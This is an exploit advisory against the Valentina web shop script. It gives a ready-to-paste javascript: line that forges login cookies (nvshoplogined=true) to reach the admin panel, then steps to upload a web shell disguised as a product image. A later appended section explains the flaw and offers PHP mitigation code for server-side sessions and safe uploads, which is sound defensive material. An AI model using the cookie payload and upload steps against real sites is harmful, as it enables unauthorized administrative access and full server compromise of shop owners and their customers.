Valentina suffers from a cookie handling vulnerability that allows for privilege escalation and a shell upload.
< ------------------- header data start ------------------- >
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
# Application Name : Valentina
# Vulnerable Type : Cookie Handling Vulnerability
# Infection : SQL Info GET...
# Author : Septemb0x
# Script Down.& WebSite : http://s2.dosya.tc/valentina.zip.html - http://www.valya.ru
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
javascript:document.cookie = "nvshoplogin=; path=/;"; document.cookie = "nvshoplogined=true; path=/;"; document.cookie = "nvshoppassword=; path=/;";
1. Cookie Changed,
2. Go To http://[target]/[path]/admin/goods.php
3. Add Product And Add Image(Shell) Upload.
4. Go to Add Product Page > Product Image Right Click > Features > *SHELL LINK* ;)
< -- bug code end of -- >
# Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends...
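
The steps above work because the admin pages treat a cookie the browser can set (nvshoplogined=true) as proof of login, and the product image upload then accepts a script. A mitigation sketch in PHP, added here and not taken from Valentina's source: the function names, the $adminHashes array and the admin_user session key are assumptions, and PHP 7.3 or later is assumed.

```php
<?php
// Added example with hypothetical names; not Valentina's source. PHP >= 7.3.

// Weak pattern implied by the advisory: the browser decides whether it is logged in.
function is_admin_weak(array $cookies): bool {
    return ($cookies['nvshoplogined'] ?? '') === 'true';
}

// Start the server-side session; call before any output is sent.
function start_session(): void {
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_set_cookie_params(['path' => '/', 'httponly' => true, 'samesite' => 'Lax']);
        session_start();
    }
}

// Hardened: the login flag lives in the session and is set only after the
// server has verified the password against a stored password_hash() value.
function login(string $user, string $password, array $adminHashes): bool {
    $hash = $adminHashes[$user] ?? null;
    if ($hash === null || !password_verify($password, $hash)) {
        return false;
    }
    start_session();
    session_regenerate_id(true);   // issue a fresh session id at login
    $_SESSION['admin_user'] = $user;
    return true;
}

// Call at the top of every admin page (e.g. admin/goods.php).
function require_admin(): void {
    start_session();
    if (!isset($_SESSION['admin_user'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// Product image upload: type decided from file content, name and extension
// chosen by the server, so an uploaded script never keeps a .php name.
function store_product_image(array $file, string $destDir): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) return null;
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset($allowed[$mime])) return null;
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    return move_uploaded_file($file['tmp_name'], $destDir . '/' . $name) ? $name : null;
}
```

Serving the upload directory with script execution disabled in the web server configuration closes the remaining gap if a file with a script extension ever lands there.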